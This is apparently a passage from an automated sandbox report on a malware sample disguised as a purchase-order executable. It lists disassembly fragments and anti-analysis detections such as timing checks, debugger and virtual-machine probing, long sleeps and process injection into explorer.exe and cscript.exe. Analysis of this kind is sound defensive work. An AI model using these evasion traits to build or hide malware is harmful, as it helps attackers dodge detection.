          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041EA1C push dword ptr [D4EF9124h]; ret 2_2_0041EA3E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041D56C push eax; ret 2_2_0041D572
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041D502 push eax; ret 2_2_0041D508
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0041D50B push eax; ret 2_2_0041D572
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_00402D89 push ebp; iretd 2_2_00402D8A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0170225F pushad ; ret 2_2_017027F9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017027FA pushad ; ret 2_2_017027F9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017309AD push ecx; mov dword ptr [esp], ecx2_2_017309B6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0170283D push eax; iretd 2_2_01702858
          Source: C:\Windows\explorer.exeCode function: 3_2_0E641B02 push esp; retn 0000h3_2_0E641B03
          Source: C:\Windows\explorer.exeCode function: 3_2_0E641B1E push esp; retn 0000h3_2_0E641B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0E6419B5 push esp; retn 0000h3_2_0E641AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_0F283B02 push esp; retn 0000h3_2_0F283B03
          Source: C:\Windows\explorer.exeCode function: 3_2_0F283B1E push esp; retn 0000h3_2_0F283B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_0F2839B5 push esp; retn 0000h3_2_0F283AE7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_0070DF11 push ecx; ret 4_2_0070DF24
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_04F009AD push ecx; mov dword ptr [esp], ecx4_2_04F009B6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBE266 push E89010BFh; ret 4_2_02DBE582
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DB7090 pushad ; iretd 4_2_02DB7096
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBD4B5 push eax; ret 4_2_02DBD508
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBD56C push eax; ret 4_2_02DBD572
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBD50B push eax; ret 4_2_02DBD572
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBD502 push eax; ret 4_2_02DBD508
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DBEA1C push dword ptr [D4EF9124h]; ret 4_2_02DBEA3E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_02DA2D89 push ebp; iretd 4_2_02DA2D8A
          Source: Purchase Order#23113.exeStatic PE information: section name: .text entropy: 7.961859461470405
          Source: 0.2.Purchase Order#23113.exe.7f30000.8.raw.unpack, 0.2.Purchase Order#23113.exe.4321f70.4.raw.unpack High entropy of concatenated method names
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match, File source: Process Memory Space: Purchase Order#23113.exe PID: 6564, type: MEMORYSTR
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 2DA9904 second address: 2DA990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 2DA9B7E second address: 2DA9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Memory allocated: 1420000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Memory allocated: 30C0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Memory allocated: 2FD0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Memory allocated: 7C90000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Memory allocated: 8C90000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Memory allocated: 8E30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Memory allocated: 9E30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Memory allocated: A170000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Memory allocated: B170000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Code function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exe Window / User API: threadDelayed 9579
          Source: C:\Windows\explorer.exe Window / User API: threadDelayed 353
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 887
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 864
          Source: C:\Windows\SysWOW64\cscript.exe Window / User API: threadDelayed 4590
          Source: C:\Windows\SysWOW64\cscript.exe Window / User API: threadDelayed 5382
          Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_3-13908
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe API coverage: 1.7 %
          Source: C:\Windows\SysWOW64\cscript.exe API coverage: 1.3 %
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe TID: 6708 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3272 Thread sleep count: 9579 > 30
          Source: C:\Windows\explorer.exe TID: 3272 Thread sleep time: -19158000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3272 Thread sleep count: 353 > 30
          Source: C:\Windows\explorer.exe TID: 3272 Thread sleep time: -706000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6728 Thread sleep count: 4590 > 30
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6728 Thread sleep time: -9180000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6728 Thread sleep count: 5382 > 30
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6728 Thread sleep time: -10764000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_00712674 GetFileAttributesW, GetLastError, FindFirstFileW, WideCharToMultiByte, GetLastError, __alloca_probe_16, WideCharToMultiByte, GetFileAttributesA, GetLastError, FindFirstFileA, FindClose, 4_2_00712674
          Source: explorer.exe, 00000003.00000000.1778932144.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000003.3106694802.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000003.00000002.4202743547.00000000078A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000003.00000000.1778932144.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
          Source: explorer.exe, 00000003.00000000.1773041835.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000003.00000000.1778932144.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000003.00000003.3106694802.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000003.00000003.3106694802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106694802.000000000982D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.1778932144.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000003.3105954537.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000003.00000002.4205263582.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000003.00000000.1773041835.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000000.1773041835.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Code function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe Code function: 2_2_0040ACF0 LdrLoadDll, 2_2_0040ACF0
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0070AA82 LoadLibraryW, GetProcAddress, FreeLibrary, 4_2_0070AA82
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01808324 mov eax, dword ptr fs:[00000030h]2_2_01808324
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01808324 mov eax, dword ptr fs:[00000030h]2_2_01808324
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE3DB mov eax, dword ptr fs:[00000030h]2_2_017DE3DB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE3DB mov eax, dword ptr fs:[00000030h]2_2_017DE3DB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE3DB mov ecx, dword ptr fs:[00000030h]2_2_017DE3DB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DE3DB mov eax, dword ptr fs:[00000030h]2_2_017DE3DB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D43D4 mov eax, dword ptr fs:[00000030h]2_2_017D43D4
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D43D4 mov eax, dword ptr fs:[00000030h]2_2_017D43D4
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EC3CD mov eax, dword ptr fs:[00000030h]2_2_017EC3CD
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A3C0 mov eax, dword ptr fs:[00000030h]2_2_0173A3C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A3C0 mov eax, dword ptr fs:[00000030h]2_2_0173A3C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A3C0 mov eax, dword ptr fs:[00000030h]2_2_0173A3C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A3C0 mov eax, dword ptr fs:[00000030h]2_2_0173A3C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A3C0 mov eax, dword ptr fs:[00000030h]2_2_0173A3C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A3C0 mov eax, dword ptr fs:[00000030h]2_2_0173A3C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017383C0 mov eax, dword ptr fs:[00000030h]2_2_017383C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017383C0 mov eax, dword ptr fs:[00000030h]2_2_017383C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017383C0 mov eax, dword ptr fs:[00000030h]2_2_017383C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017383C0 mov eax, dword ptr fs:[00000030h]2_2_017383C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B63C0 mov eax, dword ptr fs:[00000030h]2_2_017B63C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0180634F mov eax, dword ptr fs:[00000030h]2_2_0180634F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01728397 mov eax, dword ptr fs:[00000030h]2_2_01728397
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01728397 mov eax, dword ptr fs:[00000030h]2_2_01728397
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01728397 mov eax, dword ptr fs:[00000030h]2_2_01728397
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172E388 mov eax, dword ptr fs:[00000030h]2_2_0172E388
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172E388 mov eax, dword ptr fs:[00000030h]2_2_0172E388
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172E388 mov eax, dword ptr fs:[00000030h]2_2_0172E388
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175438F mov eax, dword ptr fs:[00000030h]2_2_0175438F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175438F mov eax, dword ptr fs:[00000030h]2_2_0175438F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E0274 mov eax, dword ptr fs:[00000030h]2_2_017E0274
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01734260 mov eax, dword ptr fs:[00000030h]2_2_01734260
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01734260 mov eax, dword ptr fs:[00000030h]2_2_01734260
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01734260 mov eax, dword ptr fs:[00000030h]2_2_01734260
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172826B mov eax, dword ptr fs:[00000030h]2_2_0172826B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172A250 mov eax, dword ptr fs:[00000030h]2_2_0172A250
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01736259 mov eax, dword ptr fs:[00000030h]2_2_01736259
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EA250 mov eax, dword ptr fs:[00000030h]2_2_017EA250
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017EA250 mov eax, dword ptr fs:[00000030h]2_2_017EA250
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B8243 mov eax, dword ptr fs:[00000030h]2_2_017B8243
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B8243 mov ecx, dword ptr fs:[00000030h]2_2_017B8243
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172823B mov eax, dword ptr fs:[00000030h]2_2_0172823B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_018062D6 mov eax, dword ptr fs:[00000030h]2_2_018062D6
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017402E1 mov eax, dword ptr fs:[00000030h]2_2_017402E1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017402E1 mov eax, dword ptr fs:[00000030h]2_2_017402E1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017402E1 mov eax, dword ptr fs:[00000030h]2_2_017402E1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A2C3 mov eax, dword ptr fs:[00000030h]2_2_0173A2C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A2C3 mov eax, dword ptr fs:[00000030h]2_2_0173A2C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A2C3 mov eax, dword ptr fs:[00000030h]2_2_0173A2C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A2C3 mov eax, dword ptr fs:[00000030h]2_2_0173A2C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0173A2C3 mov eax, dword ptr fs:[00000030h]2_2_0173A2C3
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017402A0 mov eax, dword ptr fs:[00000030h]2_2_017402A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017402A0 mov eax, dword ptr fs:[00000030h]2_2_017402A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C62A0 mov eax, dword ptr fs:[00000030h]2_2_017C62A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C62A0 mov ecx, dword ptr fs:[00000030h]2_2_017C62A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C62A0 mov eax, dword ptr fs:[00000030h]2_2_017C62A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C62A0 mov eax, dword ptr fs:[00000030h]2_2_017C62A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C62A0 mov eax, dword ptr fs:[00000030h]2_2_017C62A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C62A0 mov eax, dword ptr fs:[00000030h]2_2_017C62A0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0180625D mov eax, dword ptr fs:[00000030h]2_2_0180625D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E284 mov eax, dword ptr fs:[00000030h]2_2_0176E284
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E284 mov eax, dword ptr fs:[00000030h]2_2_0176E284
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B0283 mov eax, dword ptr fs:[00000030h]2_2_017B0283
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B0283 mov eax, dword ptr fs:[00000030h]2_2_017B0283
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B0283 mov eax, dword ptr fs:[00000030h]2_2_017B0283
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176656A mov eax, dword ptr fs:[00000030h]2_2_0176656A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176656A mov eax, dword ptr fs:[00000030h]2_2_0176656A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176656A mov eax, dword ptr fs:[00000030h]2_2_0176656A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01738550 mov eax, dword ptr fs:[00000030h]2_2_01738550
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01738550 mov eax, dword ptr fs:[00000030h]2_2_01738550
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740535 mov eax, dword ptr fs:[00000030h]2_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740535 mov eax, dword ptr fs:[00000030h]2_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740535 mov eax, dword ptr fs:[00000030h]2_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740535 mov eax, dword ptr fs:[00000030h]2_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740535 mov eax, dword ptr fs:[00000030h]2_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740535 mov eax, dword ptr fs:[00000030h]2_2_01740535
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E53E mov eax, dword ptr fs:[00000030h]2_2_0175E53E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E53E mov eax, dword ptr fs:[00000030h]2_2_0175E53E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E53E mov eax, dword ptr fs:[00000030h]2_2_0175E53E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E53E mov eax, dword ptr fs:[00000030h]2_2_0175E53E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E53E mov eax, dword ptr fs:[00000030h]2_2_0175E53E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C6500 mov eax, dword ptr fs:[00000030h]2_2_017C6500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804500 mov eax, dword ptr fs:[00000030h]2_2_01804500
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E5E7 mov eax, dword ptr fs:[00000030h]2_2_0175E5E7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017325E0 mov eax, dword ptr fs:[00000030h]2_2_017325E0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C5ED mov eax, dword ptr fs:[00000030h]2_2_0176C5ED
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C5ED mov eax, dword ptr fs:[00000030h]2_2_0176C5ED
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017365D0 mov eax, dword ptr fs:[00000030h]2_2_017365D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176A5D0 mov eax, dword ptr fs:[00000030h]2_2_0176A5D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176A5D0 mov eax, dword ptr fs:[00000030h]2_2_0176A5D0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E5CF mov eax, dword ptr fs:[00000030h]2_2_0176E5CF
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176E5CF mov eax, dword ptr fs:[00000030h]2_2_0176E5CF
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017545B1 mov eax, dword ptr fs:[00000030h]2_2_017545B1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017545B1 mov eax, dword ptr fs:[00000030h]2_2_017545B1
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B05A7 mov eax, dword ptr fs:[00000030h]2_2_017B05A7
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017B05A7 mov eax, dword ptr fs:[00000030h]2_2_017B05A7
